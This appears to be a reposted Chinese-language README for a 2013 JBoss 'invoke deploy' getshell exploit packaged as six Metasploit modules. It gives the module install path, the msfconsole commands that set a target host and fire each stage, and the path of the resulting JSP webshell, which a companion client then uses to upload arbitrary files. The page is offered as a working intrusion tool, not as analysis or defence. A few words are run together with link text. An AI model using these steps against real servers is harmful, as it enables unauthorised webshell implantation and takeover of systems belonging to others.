[EXP]K8 jboss invoke deploy getshell exploit

MSF jboss invoke deploy EXPLOIT moudlegit

Date:2013.11.28
Author:K8gegegithub

改這個EXP中 過程有點不進人意 沒能在一個payload裏直接輸出小馬
無奈只能分紅了6步來執行,長度有限制 只能一次寫入一段內容。
以追加方式寫入 最後才構造出 JSP 小馬...jsp

用法
BT5  MSF 下 JBOSS EXP存放路徑 把這幾個腳本丟到這裏來
/opt/metasploit/msf3/modules/exploit/multi/http/

msfconsole
use exploit/multi/http/jboss_invoke_deploy_K80

use exploit/multi/http/jboss_invoke_deploy_K81
use exploit/multi/http/jboss_invoke_deploy_K82
use exploit/multi/http/jboss_invoke_deploy_K83
use exploit/multi/http/jboss_invoke_deploy_K84
use exploit/multi/http/jboss_invoke_deploy_K85

set RHOST 172.16.126.134
exploit

成功後小馬路徑爲  www.xxoo.com/jboosjdk/inc.jsp  
使用K8新型小馬客戶端鏈接 可上傳任意格式文件get

 

https://github.com/k8gege/JbossExploitit

https://github.com/k8gege/K8toolsconsole

相關文章
相關標籤/搜索